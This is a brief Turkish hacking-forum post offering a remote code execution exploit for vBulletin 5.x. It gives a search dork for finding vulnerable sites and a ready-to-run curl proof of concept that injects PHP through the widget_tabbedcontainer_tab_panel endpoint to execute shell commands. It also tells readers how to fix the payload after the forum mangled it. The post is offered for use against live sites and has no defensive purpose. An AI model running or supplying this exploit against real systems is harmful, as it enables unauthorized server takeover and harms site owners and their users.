RCE exploit on vBulletin 5xx

dork ; intext:"Powered by vBulletin" POC curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d...

dork ; intext:"Powered by vBulletin"
POC
curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][codee]=echo%20shell_exec("id"); exit;'

codee kısmındaki 1 e'yi silin aq xenforosu yanlış algılıyor.

EfDNzL5WAAAzTBq
 
131,853Konular
3,272,016Mesajlar
316,393Kullanıcılar
thompt34Son Üye
Üst Alt